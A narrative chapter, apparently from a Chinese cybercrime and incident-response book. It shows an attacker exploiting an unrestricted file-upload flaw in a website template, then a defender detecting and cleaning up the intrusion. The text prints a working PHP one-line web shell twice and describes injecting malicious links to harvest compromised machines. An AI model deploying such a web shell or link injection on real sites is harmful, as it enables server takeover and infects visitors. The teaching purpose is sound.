- 网络犯罪过程分析与应急响应:红黑演义实战宝典
- 张胜生 刘静 陈乐然
- 11字
- 2021-01-25 17:45:57
第2章 知己知彼百战百胜
2.1 背景
幽暗的小房间里,一行行绿色的HTML代码在黑色的屏幕中飞快地移动,映在屏幕前徐漠专注的脸上。
“哈,这又是一个模板网站。”徐漠伸了个懒腰,活动了下已经弯曲一个多小时的腰骨。
在网络上,像天空之城公司这样使用模板进行二次开发的网站并不罕见,至少10个网站中,有5个就是用模板改建而成的,使用网站模板,有利于企业快速、廉价地拥有一个精美的门户网站,而不需要大费周章地进行开发,但随之带来的安全问题却比比皆是。
网站模板一般是公开在Internet上的,任何个人、组织都可以任意下载,天空之城公司的网站使用模板改建而成,这就意味着,徐漠可以从网上获取到这个网站模板的源代码!
事实上,徐漠也这么做了,他很轻易地就找到了天空之城公司网站所用的模板,并仔细研究了几天。
通过几天的漏洞挖掘和测试,徐漠找到了这个网站模板存在的文件上传漏洞,这个漏洞存在的原因是,网站后端程序没有对用户上传的文件类型做出限制,允许用户直接上传任意类型的文件。
徐漠忍不住打了个响指,他站起身来,在空无一人的房间中,走向了一面钉满纸张和照片的木墙前,狠狠地凝视着报纸上的于志豪,喃喃自语道:“于先生,这些年来我所承受的耻痛,我会让你加倍偿还的。”
徐漠慢慢地回到了电脑前,在脚本编辑器上写上了一段熟悉的代码。
<?php@eval($_POST['xumo']);?>
这段代码是被无数黑客广泛使用的PHP一句话木马,它短小精悍,上传到目标服务器后,通过webshell客户端连接则可控制服务器,进行任意操作。
徐漠把这段代码保存成一个名为“shell.php”的文件,尝试在天空之城公司网站上进行上传,果不其然,这个文件被成功上传,成为服务器上的webshell。
徐漠一阵狂喜,没想到这个网站这么容易就被自己拿下了,徐漠用webshell客户端对服务器文件进行了遍历,没发现什么有价值的东西,但徐漠还是在其网站首页代码中,植入了一个黑链。
要知道,在黑市中,是有人专门做这种交易的,特别是这种在搜索引擎中权重较高、访问量较大的网站,在其网站上植入黑链,可以保证黑链被更多访问者点击,从而获得更多肉鸡以供在黑市中贩卖,按照一个肉鸡5元的价格,在这个日均点击率上万的网站中植入黑链,徐漠就已经足以获得很大利益了。
……
在清晨的第一缕阳光中,柯小玲端着一杯咖啡和一袋面包,坐在她的办公椅上,心情不错,新一天的工作又开始了。
今天,柯小玲如往常一样,对照了基线检查文档,对所有网络资产进行安全检查。但是,当柯小玲检查到公司网站服务器时,她沉下了脸。
在网站目录中,index.php文件的修改时间居然是昨晚的凌晨两三点,但在这个时间,柯小玲并没有对网站文件进行修改,很显然,徐漠来了。
柯小玲用备份的网站源代码与服务器上现有的源代码进行比对,发现index.php文件的末尾被加入了黑链,柯小玲一惊,急急忙忙翻出了Web的日志文件,发现已经有不少人访问过网站了,换言之,已经有人中招。
柯小玲不仅在Web日志文件中找到了这些受害者的访问记录,还发现网站服务器被上传了一个名为shell.php的文件,柯小玲顺着路径找到并打开了这个文件,发现里面只有一行代码。
<?php@eval($_POST['xumo']);?>
“真是气死我了,有人竟然向我们的服务器上传了一句话木马。”柯小玲拍了一下桌子,怒目圆瞪地叫道。
柯小玲迅速删除了这个shell.php文件,并用备份的index.php文件替换已经被植入黑链的index.php文件,网站暂时恢复了平静。